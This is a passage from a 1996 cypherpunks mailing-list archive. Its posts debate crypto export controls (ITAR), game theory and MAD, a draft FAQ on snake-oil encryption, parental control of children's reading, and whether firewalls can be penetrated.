Content-Type: text/plain


On 20 Jul 96 14:46:12 -0800, ceridwyn@wolfenet.com wrote:

>>BTW, I'd try a fiber-optic connector to the machine because 1) it's
>
>Do you know anything about where to find info. on connecting drives
>(IDE or SCSI) with fiber?  I'm very interested in this possibility,
>but need to research further.  I'd like to home-build a system, but 
>any info on current products would also be helpful.

One, you could probably replace the wires with fiber/xmitter pairs.
However, this would probably screw your timings to hell - SCSI probably
wouldn't work.  OTOH, it's possible that with a careful enough job and
some decent components you could pull it off. It would be incredibly
wasteful, though, as you would need 40+ fibers to do the job of one...

I'd find some network cards that support fiber and breadboard a little
system together. Possibly, you could find a hookup that would work off
the shelf - look for sources for embedded systems. For instance, at least
Novell's networks have embedded system support. I recall a DDJ that had
someone wire up a coffemaker as a network controlled device, so I doubt
you'd need a PC.  As I recall, he had a single chip ethernet device. Now,
this was for regular ethernet, but I'd assume you could connect a fiber
based ethernet over with some sort of adapter.  Search for the article at
http://www.ddj.com - if you can't find it there, drop me a note.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Llywarch Hen <ecgwulf@worldnet.att.net>
Date: Sun, 21 Jul 1996 20:45:15 +0800
To: cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <2.2.16.19960721102109.1d6775d2@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote:
>Game theory is terribly important to Cypherpunks.
Definite agreement here. Wait ... it gets better.

>                                                     . . . Creating a
terrifying image,
>an image of crazed indifference, is a useful thing. Certainly the S.S.
>understood the power of their frightening uniforms and the "myth" of their
>bloodthirstiness. (Note: I am not saying their bloodthirstiness was a myth,
>but that they deliberately cultivated this image. Intimidation works,
>game-theoretically.)

What Timothy May espouses is not the appearance of craziness but actual
insanity itself.

>                                 . . . Even the "MAD" policy of "mutually
assured
>destruction" has game-theoretic justification. (Indeed, this is virtually a
>truism, given the role game theory and the RAND Corporation played in the
>devising of the MAD strategy.) While humanists and liberals may cluck at
>the admittedly horrible consequences of MAD, were it ever implemented, it
>is solidly grounded in these "games." Fortunately, the goal of MAD was to
>not have to be used, and it appears now to have worked quite well (albeit
>at high cost).

Recall that during the time MAD supposedly worked that both of Reagan and
Brezhnev were comatose much, if not all of the time. The crazies were out of
the picture. Who was in charge? Let's suppose it was the generals. Who would
know better their systems were shit? Recall on the day that Reagan was shot
that Alexander Haig appeared on national TV and announced 'I am in charge
here.' Haig was not constitutionally in charge of anything. Did he mean 'we'
not 'I'. Who would that 'we' be? The twentieth century is drawing to a close
as the world's most bloodthirsty by far: 40 mil under Stalin, 25 mil under
Mao, 8 mil under Hitler, and so on. There are no heroes. Timothy May
suggests that we continue to play his stupid game. Much of the cold war for
public consumption was predicated on the notion that ends do not justify
means. It was rather profitable for some interests however.

The numbers speak for a strong info-war capability. But what we are asked to
do is to refight the last war with grandpa, who we find out stayed home and
watched it on TV but gets off on all this scary shit. Especially the uniforms.

Perhaps Timothy May through luck, manipulation and hard work has made it up
toward the head of the line to feed at the public trough and then declare to
the rest of us that we have a free and competitive market. He will cite
Hudson, Heritage, RAND, ... AEI, and Cato whose shining lights best
understand who it is that is signing their paychecks. These are the folks
that bought us Vietnam, did not pay for it in lives or money, but profited
immensely. He cites Kahn whose best game is the consulting game.

Wanna buy a hot stock? Buy Steven Emerson -- guy's gonna take off.

-- Llywarch Hen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 21 Jul 1996 16:01:51 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <199607202058.QAA19736@unix.asb.com>
Message-ID: <Pine.LNX.3.94.960721055512.264A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 20 Jul 1996, Deranged Mutant wrote:

> Date: Sat, 20 Jul 1996 16:37:40 +0000
> From: Deranged Mutant <WlkngOwl@unix.asb.com>
> To: cypherpunks@toad.com
> Subject: A Snake-Oil FAQ
> 
> 
> I've written a short "Snake Oil FAQ" below.  It's incomplete and 
> needs some work (adding a few definitions, rewording, aesthetic 
> formatting, etc.), so think of it as a 'beta' FAQ (please don't post 
> it on web pages, though I don't mind if it's distributed among 
> anyone interested in criticizing or contributing).   Comments and
> suggestions would be appreciated.   Note that the aim is to write
> something  accessible to 'newbies'.  (Jeremy Barrett contributed to
> this, BTW)
> 
> 
>                           Snake-Oil Warning Signs
>                         Encryption Software to Avoid
> 
>                               (Revision 0.1)
> 
> 

Looks very nicely done.  I think you pretty much covered it... but...

> 
> Be wary of marketing gimmicks related to "if you can crack our
> software" contests.  
> 

Even the best cryptographers and security professionals have done this.
RSA did it with their Public Key system, which took 20+ years to break.
Throughout history, many security mechanisms, even the best ones,
including Cyphers, Locks, Firewalls, etc. have been known to go as far as
to offer prizes (some extremely high, upwards of a million dollars, some
as low as RSA's famous $100 prize)

I think that this one really is just a bit too broad.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfHIJDAJap8fyDMVAQEucAf+JxcuBAIoI0pamvlryqLQETpwrBPoVaPi
EUMNWNY1B3iG9nuQ/3U5mhdMNK0ih4RoCDifMPnKGD+iDIjUoMHmGEDtScBCLVe2
cDaAQ54JXpwNvlzhmfvaPc4wUZD/gDgtHBHLOoLZNarEPNgVLtYuFgeJeCEruqTX
UU5usrgoMUZrxT/dRnYcPs6YRT7cgOxnOWNnTsZBiIpDyEkvGPZBxZhDp25DESTq
q0zE9BLmWCgpHyi3QYXCfOTMLhkd4k/mt/LSZtEDHl55kLphtQN4N1Y1xgNK5BIs
o5cjzh7aRLc0fvw8WG1i85dxtRBhXIPAUA8sRVyPhHu9qiw82D1qcA==
=01xE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 21 Jul 1996 21:59:33 +0800
To: Cypherpunks <llurch@networking.stanford.edu>
Subject: Re: Netscape
In-Reply-To: <Pine.GUL.3.94.960720233212.873A-100000@Networking.Stanford.EDU>
Message-ID: <199607211152.HAA03185@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves writes:

: -----BEGIN PGP SIGNED MESSAGE-----
: 
: On Sat, 20 Jul 1996, Mark M. wrote:
: > On Sat, 20 Jul 1996, Tom Weinstein wrote:
: > 
: > > Why not consider what the consequences will be?  Do you seriously
: > > believe that this will make the government stop enforcing ITAR?
: > 
: > The government has yet to enforce ITAR.  The only thing they have been doin
: g
: > is threatening companies who make products with strong crypto.  If anyone w
: as
: > ever actually put on trial for a violation of ITAR, it would almost certain
: ly
: > be found to be unconstitutional.
: 
: So do it. None of this anonymous bullshit, or trying to drag Netscape into
: it. 
: 
: I'd donate whatever I could to a Cypherpunk Legal Defense Fund. We only need
: one volunteer with a lot of time on his/her hands. 
: 

Fortunately one does not have to be prosecuted to test the
constitutionality of the ITAR as they apply to cryptography: the
Bernstein and Karn cases have already been brought and at least one
other is in the pipeline.  But no one seems to be setting up a Legal
Attack Fund to support such litigation.  Perhaps some of those active on
the cypherpunks list would be interested in creating and supporting such
a fund.  One would hope that those corporate interests who keep
complaining about how the ITAR cut into their potential profits would be
willing to contribute.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 01:14:33 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607200646.CAA15585@lists.gateway.com>
Message-ID: <v03007602ae17f7879532@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM -0700 7/20/96, Vinnie Moscaritolo wrote:
> On 19 Jul 1996 19:51:39 Hallam-Baker wrote
>>It is no coincidence that the Tree of Liberty needs to be watered with
>>blood on occasion.
>
>As a native Bostonian, I have to tell you that the original "Tree of
>Liberty" was cut down many many years ago and in it's place now stands a
>storefront, if you look up onto the second floor you will notice a frieze
>of a tree. This is all that stands to commemerate the "Tree of Liberty".
>
>
>oh btw that storefront is in the comabat zone of boston, and the last time
>I checked that  store was called either the "Naked I"or the "Pussycat
>lounge", can you guess what they sell?
>

This is too good to pass up. The modern version, then is:

"The tree of liberty must be titillated with the money of sex-seekers."

David
MIT '54






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 22 Jul 1996 10:09:34 +0800
To: cypherpunks@toad.com
Subject: Re: The Orchid Ring of (Probable) Child Pornographers
Message-ID: <199607220000.RAA07789@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:43 PM 7/17/96 -0700, Timothy C. May wrote:
> As such, potentially powerful ammunition for
> those who would like restrictions placed on crypto. (Especially if it turns
> out that law enforcement learned of the Orchid Ring through non-encrypted
> communications.)

Fortunately they were caught by much lower tech methods.  One of their 
models changed her mind and complained to her parents, the cops grabbed 
the guy and pursuaded him to spill the beans.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 01:18:10 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: MIT harassed over publication of PGP book
In-Reply-To: <2.2.32.19960720220935.0086d2c0@panix.com>
Message-ID: <v03007604ae17faed61b0@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:09 PM -0700 7/20/96, Duncan Frissell wrote:
>At 02:06 AM 7/10/96 EDT, Hal Abelson wrote:
>>
>>Now, we learn of a back channel communication from State to DOE to
>>Sandia, which has prompted Sandia to want to act as a policeman for
>>MIT vis a vis export controls.
>>
>>This is troubling for what it says about how the State Department is
>>dealing with export issues surrounding information about cryptography,
>>and about the extent to which policies are being administered in a
>>clear and above-board manner.
>
>A blue ribbon panel of Ivy League administrators warned in the mid 1950s
>that Universities which accepted public funds would lose their independence
>and become mere functionaries of the federal government.  They were right
>and you all had fair warning.
>

As Hal Abelson should well know, at least the undergraduates at MIT used to
call the John T. Dorrance Lab (a big food sciences building) "the
Campbell's Soup Lab". It's not just government.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 01:29:13 +0800
To: Tom Weinstein <cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <199607200930.LAA08360@basement.replay.com>
Message-ID: <v03007605ae17fb8c8700@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:27 PM -0700 7/20/96, Tom Weinstein wrote:

>>> And thus it begins... I think it's a bad idea to provoke the TLAs
>>> like this, but I suppose it's inevitable.
>>
>> Why is it a bad idea? If you don't do it, you support the ITAR
>> by your lack of action! Every day that you don't export strong
>> crypto you assist the enemy.
>
>Why not consider what the consequences will be?  Do you seriously
>believe that this will make the government stop enforcing ITAR?  Do you
>believe it will make them change the law?  No.  What it will do is make
>them remove our permission to distribute this stuff.

Remind anyone of the old aphorism "I will fight to the death the right to
say it. Your death."?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Sun, 21 Jul 1996 23:28:16 +0800
To: cypherpunks@toad.com
Subject: Re: Firewall Penetration
Message-ID: <9607211223.AA29688@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:18 PM 7/20/96 -0700, Jerome Tan allegedly wrote:

> Is it possible to penetrate a firewall?

Absolutely.  (Having done so a time or two)

FWIW, of @70 firwalls on the market, only @5 are adequate to protect 
a company from the hazards of the Internet.

Before anyone asks, Fortified Networks is a vendor-neutral InfoSec 
Consulting company and doesn't sell firewalls or other security products.

Best Regards,


Frank
Any sufficiently advanced bug is indistinguishable from a feature.
	-- Rich Kulawiec

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Information Security Consulting 
http://www.fortified.com     Phone: (317) 573-0800     FAX: (317) 573-0817     
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 22 Jul 1996 10:29:48 +0800
To: Tom Weinstein <cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <199607220009.RAA08680@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:
> Why not consider what the consequences will be?  Do you seriously
> believe that this will make the government stop enforcing ITAR? 

Yes:  

Widespread politically motivated disobedience forces
the state to either demonize the disobedient, (as with drug users)
or give up enforcement.  This is a standard and effective method
of forcing the repeal of laws, a method which has had a long record
of success for several hundred years.

The states cohesion derives from its legitimacy, and threats to
legitimacy and cohesion are treated very seriously by government
officials.

Threatening the states legitimacy is arguably more effective in 
influencing government behavior than blowing up federal office
buildings.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 01:48:38 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <199607210701.AAA00292@netcom10.netcom.com>
Message-ID: <v03007606ae17fd2ce8bd@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 AM -0700 7/21/96, Mike Duvos wrote:
>David Sternlight (david@SternBot.com) writes:

The above suggests your mind is closed. I'm going to respond once for the
benefit of other readers before plonking you. Feel free to e-mail me if you
really want a discussion and not just to hear yourself talk.

>
> > There are many others who have come to similar conclusions
> > about the formation of independent judgement in children,
> > and lots of non-Piaget experiments. Your comments are
> > diversionary and in fact by the end of your post you come to
> > agree with my basic point.
>
>Every doctrine has its followers, and I will admit "Piaget-Speak"
>is still quite popular in certain circles, and its buzzwords are
>often heard in arguments promoting child inferiority and
>dismissing childrens' concerns.

Irrelevant.

>
>That hardly means I agree with your basic point, which is that
>parents should be able to do whatever they want in controlling
>their childrens' information sources without their children
>having any recourse against them.

The job of a parent is exactly that. The "benevolent despotism" begins
totally, when a child is unable to survive physically unaided, and
gradually diminishes as a child achieves increasing independence--to eat,
to walk, to read, to think, to make independent critical judgements.

>
> > That is also false in its implications. Librarians are in
> > loco parentis,
>
>This, of course, varies with local statutes, as does the legal
>definition of "In Loco Parentis." Generally it applies to
>teachers, people hired to care for children, and some relatives,
>such as grandparents.  I am not familar with any locale where
>librarians are specifically mentioned, and most librarians will
>be more than happy to explain to you that a library is not a free
>babysitting service, and that they are not caregivers.

This is a massive evasion. I referred to librarians' traditional role in
managing children's reading. Most libraries (for instance) won't permit
young children in the adult stacks, and many have a children's card that
isn't valid for certain kinds of books. Further, librarians often observe
what children are reading and try to gently guide them--mostly informed by
the child's tastes but also with a certain "keep them out of hot water"
flavor.  Big, busy libraries may not be able to do that, but I am forever
grateful for mine in Hartford, Connecticut. Under the gentle guidance of
librarians my intellectual development was stimulated in such a way that
I'm convinced it was one factor in my eventually being able to get into
MIT. And yes, they wouldn't let me into some sections until I was at an age
where they thought I could handle it.

>
> > and most libraries are VERY careful about what materials
> > young children are exposed to and what is more, are
> > responsive to community pressure in the matter since most
> > libraries are community-based.
>
>Most libraries let "young adults" (read anyone who has hit their
>teenage years) read pretty much anything they want.

We're not talking about "young adults" here. It's been clear from my
comments from the beginning that I was talking about young children. Piaget
didn't do all that much with teen-agers.

>  "Parents on
>the warpath" have managed to apply pressure in recent years, and
>libraries are a bit less free than they used to be, but I think
>the American Library Association has done a pretty good job in
>standing its ground against agitators and pressure groups.

This has to do with attempted censorship of what adults may read, and is
totally off-topic.

>
> > So after trying to refute my point, you come to agree with
> > it and want to shift the issue to the question of at what
> > age....
>
>No - I stated in my original message that young children do need
>some reasonable constraints to guard them from exposure to
>material which might cause them emotional pain.

More than that, you conceded that the constraints should be tailored to the
age of the child (or at least what could be observed about the child's
maturity). That was my only point and one with which you at first
disagreed. Reread your post--you are really blind to your own prejudices
about my posts.

>
>This is far different from your assertion that minors (everyone
>under 18) should have no access to any information that their
>parents do not pre-approve.

I never said that. Please provide evidence that I did.

>
> > I'm not competent to assess that nor, I assert, are you; I
> > suggest it varies with the child and it's up to the
> > individual parent to make those subtle distinctions, issue
> > by issue, child by child.
>
>Nothing subtle about it David.  Once young people have passed
>through early childhood, the burden of proof is on anyone who
>suggests that they should be insulated from social and political
>reality to provide a convincing reason why. Parental
>capriciousness doesn't qualify.

On this we disagree. It is a legitimate disagreement. And "capriciousness"
is a dishonest misrepresentation of what I said.

>
> > As I parse the above sentence it says limiting is often
> > justified but it might not be.
>
>Parse the sentence again.  What it says is that although
>"protecting children" is often the excuse used to limit older
>childrens' access to controversial material, the reality is that
>it is usually an effort to control their thinking on certain
>issues by making sure they have only one viewpoint, that of their
>parents.

Reread your own sentence (which I note you don't quote). It says what I
claim, not your revisionist rewriting above.

>
> > If so, it's up to the parents to figure ou where THEIR kid
> > is on the scale--nobody else has as much time, motivation,
> > or opportunity to observe.
>
>As is usual with Statists, the argument is seen as a debate over
>who should be doing the controlling, the notion that everyone
>needs to be controlled being a foregone conclusion.

As usual with the intellectually bankrupt, calling names such as "Statist"
is  "the last resort of the scoundrel".

Plonk!

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 01:58:52 +0800
To: The Deviant <WlkngOwl@unix.asb.com>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <199607202058.QAA19736@unix.asb.com>
Message-ID: <v03007607ae1800d8c5b1@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:03 PM -0700 7/20/96, The Deviant wrote:

>>
>>                           Snake-Oil Warning Signs
>>                         Encryption Software to Avoid
>>
>>                               (Revision 0.1)
>>
>>
>
>Looks very nicely done.  I think you pretty much covered it... but...
>
>>
>> Be wary of marketing gimmicks related to "if you can crack our
>> software" contests.
>>
>
>Even the best cryptographers and security professionals have done this.
>RSA did it with their Public Key system, which took 20+ years to break.
>Throughout history, many security mechanisms, even the best ones,
>including Cyphers, Locks, Firewalls, etc. have been known to go as far as
>to offer prizes (some extremely high, upwards of a million dollars, some
>as low as RSA's famous $100 prize)
>
>I think that this one really is just a bit too broad.

So is your comment. What was broken was not public key, but a particular
key length (and by implication shorter ones). You can do that with just
about any system, even a one-time pad, by brute force, but it won't buy you
much more than sharpening your skills, for longer keys.

One particular public key algorithm (you aren't too specific here) WAS
broken a few years ago, but that was not RSA and isn't used any longer. If
memory isn't playing tricks on me it was the knapsack algorithm.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 21 Jul 1996 23:27:19 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607210716.TAA09432@mycroft.actrix.gen.nz>
Message-ID: <Pu3eRD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Foley <paul@mycroft.actrix.gen.nz> writes:

> "Perry E. Metzger" <perry@piermont.com> wrote:
>
>    The opening in the barrel of just about every rifle or pistol I've
>    looked at seems to be about half an inch or less. Perhaps you have
>    been looking at the 18" guns on the battleship "New Jersey"?
>
>    Perry
>
> They'd be 16" guns.  I think only the Japanese had a battleship with 18
> inchers.

I've seen cruise missiles and they look much more impressive if you
know what's inside.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 21 Jul 1996 23:16:26 +0800
To: cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
In-Reply-To: <2.2.16.19960721102109.1d6775d2@postoffice.worldnet.att.net>
Message-ID: <BZ3eRD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Llywarch Hen <ecgwulf@worldnet.att.net> writes:
>                                                               25 mil under
> Mao, 8 mil under Hitler, and so on.

I'm not sure where you got these figures... Hitler had 12 million people
killed in death camps alone, about half of whom were Jews. I've heard estimates
of 100 mil killed during the cultural revolution alone. This doesn't even
begin to include the _war dead, which would be relevant to your thread.

As for historical parallels, these guys were pussies compared to the
Mongol invasions, or for that matter Roman conquests.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 01:56:48 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
In-Reply-To: <1.5.4.32.19960721091945.002f59b0@giasdl01.vsnl.net.in>
Message-ID: <v03007608ae1802020b8d@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:19 AM -0700 7/21/96, Arun Mehta wrote:
>At 21:57 20/07/96 -0700, Timothy C. May wrote:
>>
>>Fortunately, the goal of MAD was to
>>not have to be used, and it appears now to have worked quite well (albeit
>>at high cost).
>
>My problem with applying game theory to complex situations like the
>competition between powerful nations is that it is too simplistic. IANAE,
>of course, though I have done some control theory, and know how
>complex the modelling of any system becomes if it contains non-linearities,
>delays, etc. In a closed-loop system, i.e. with feedback, trying to predict
>behaviour without the foggiest notion of how to quantify the impact of
>Kennedy's grandstanding on the Kruschev mind (for instance) is questionable.

Some findings of game theory are really just formulations of common sense,
or proofs of things intuitively suspected, and are both valid and useful.
Some have worked their way into mainstream economics. I think, for example,
of the "Prisoners' Dilemma".

In fact it is exactly that result that is at the core of MAD. It only works
in advance if both sides know the payoff matrix, which is why many of the
"incomprehensible" leaks of our capabilities took place and why we took
great pains (as did the Sovs--can you say "Markov"? or "Kolmogorov"?) to do
demos of our capabilities that they could easily observe.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Mon, 22 Jul 1996 02:21:05 +0800
To: cypherpunks@toad.com
Subject: Tom Broken interviews Pres Scrotum [NOISE]
Message-ID: <v03007605ae1812c05c52@[204.179.131.57]>
MIME-Version: 1.0
Content-Type: text/plain


    INTERVIEW OF THE PRESIDENT BY TOM BROKAW OF MSNBC
            The Roosevelt Room, July 15, 1996

          MR.  BROKAW:  ....
  You and I have been looking at another question from
the Internet:  Does Chelsea net surf  and,  if  so,  how  do  you
protect  her  from  inappropriate  material?   Does  she  use the
computer pretty handily?

             THE PRESIDENT:  She does.  I  don't  think  she  net
surfs a lot, simply because, at least during the school year, she
has too much homework at night, for several  hours  every  night.
But  she  does  some.  And, honestly, I can't protect her in that
sense because she knows so much more about it than I do.

             But one of the things that we're trying to do  --  I
think  with  the  support  of everyone -- is, first of all, get a
case up to the Supreme Court so that they  can  define  what  the
First  Amendment  requires  us  to  do  and not to do in terms of
legislation here.   And  then  we  need  to  find  some  sort  of
technological fix.

             During the break  you  said  that  Mr.  Gates,  Bill
Gates,  said  that there's at least a possibility of developing a
log --

             MR. BROKAW:  Yes, they've got a  log  built  in  now
that you can go in and check on.

             THE PRESIDENT:  Yes, so the parents can  see  what's
been  called  up.   And,  of course, we're working on this V-chip
with television and with the entertainment industry supporting us
with  the  rating system.  So there probably will be some sort of
technological responses here.  But then parents like me are going
to  have to assume the responsibility of becoming literate enough
with the technology to work with our children and make sure  that
we and they make responsible choices.


Vinnie Moscaritolo
"Law - Samoan Style"
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 21 Jul 1996 23:16:40 +0800
To: cypherpunks@toad.com
Subject: New Cypherpunks, New Danger
Message-ID: <Pine.SUN.3.91.960721090217.21926A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


paranoid rants have their place; however, if they keep bursting into 
cypherpunks without knocking first, there could be an accident.

Lithium.... it's not just for watch batteries anymore.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 02:27:18 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v03007612ae16d2f7d9d6@[192.187.162.15]>
Message-ID: <v03007609ae18054bd192@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM -0700 7/20/96, Sandy Sandfort wrote:

>
>On Sat, 20 Jul 1996, David Sternlight wrote:
>
>> Glad to explain it. I used "tell" in the sense of compel, not
>> in the sense of expressing one's opinion. "Joe told us what to
>> do" is different from "Joe expressed his opinion of what we
>> should do" in the sense I used it.
>
>Really?  But you wrote:
>
>>> nor do YOU get to tell them that they are poor benighted fools
>>> who should agree with YOUR views on civil liberties. To assert
>>> otherwise is fascism, authoritarianism, dictatorship, pick one.
>
>Oh, I see, "tell," "should" and "assert" REALLY mean compel.  And
>what, exactly, would I, the "teller" be compelling them to do?  I
>now understand how you are able to win so many debates.  I guess
>I'd just better give up and take THE PLEDGE, you're just too sly
>for me.

 My use of "assert" in the above paragraph is quite different. "Tell"
applies to the act I'm discussing. "assert" refers to your comment about
the act. As for your complaint about "should", it and tell are consistent
with my meaning which was, to be more precise:

Merriam Webster's Collegiate Dictionary, Tenth Edition:

"tell...1. count, enumerate; 2. to relate in detail, narrate, give
utterance to;
3. to make known, divulge, reveal; 4. to report to, inform; 5. order,
direct; 6. to find out by observing, recognize.

I used meaning 5 in the comment you asked about.

As to your tone and subsequent remarks, this conversation is now closed.
You may have the last word. To be sure I don't inadvertently continue it
with you,...

Plonk!

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 02:18:18 +0800
To: Adam Shostack <paquin@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EFCCCC.B13@netscape.com>
Message-ID: <v0300760aae180963c7a3@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 PM -0700 7/20/96, Adam Shostack wrote:
>	Don't screw with the system, and I can bet how the policy
>review will come out.
>
>	We just had a policy review; the National Academy of Sciences
>had a very prestigious group do a review of our Cryptographic Policy.
>It suggested liberalization.
>
>	Clearly, someone didn't like that, so the Powers That Be are
>doing another policy review in the hopes of getting a review that they
>like.  If they don't get something they like, there will be another
>policy review, chaired by Loius Freeh, and taking testimony from such
>prestigious cryptographers as Dr. Denning.

This is not a technocracy, and the NAS is not a government policy review
body but an advisory one.

Having said that, your cynicism is probably well founded. :-)

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 02:29:54 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007605ae1623952449@[192.187.162.15]>
Message-ID: <v0300760bae180a1cf342@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:02 PM -0700 7/20/96, JonWienk@ix.netcom.com wrote:

>>Probably something to do with flushing dope down the toilet, or destroying
>>evidence. Perhaps it's too much to expect them to disconnect the sewer line
>>and hit your interior with a water hose and an electricity cut-off before
>>raiding it.
>
>If tests are available that can detect trace amounts of drugs in your
>urine 30
>days after snorting cocaine, they ought to be able to detect traces of
>drugs in
>the toilet bowl/sewer pipe 5 minutes after you flush...

"Your honor, I don't know who flushed it. I have many visitors to my home."
is rather different than being caught with a large stash of cocaine on your
night table.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 02:56:31 +0800
To: Frank Willoughby <cypherpunks@toad.com
Subject: Re: Firewall Penetration
In-Reply-To: <9607211223.AA29688@su1.in.net>
Message-ID: <v0300760dae180d9ec5e3@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:23 AM -0700 7/21/96, Frank Willoughby wrote:
>At 08:18 PM 7/20/96 -0700, Jerome Tan allegedly wrote:
>
>> Is it possible to penetrate a firewall?
>
>Absolutely.  (Having done so a time or two)
>
>FWIW, of @70 firwalls on the market, only @5 are adequate to protect
>a company from the hazards of the Internet.
>

o.k., I'll bite. Which 5?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
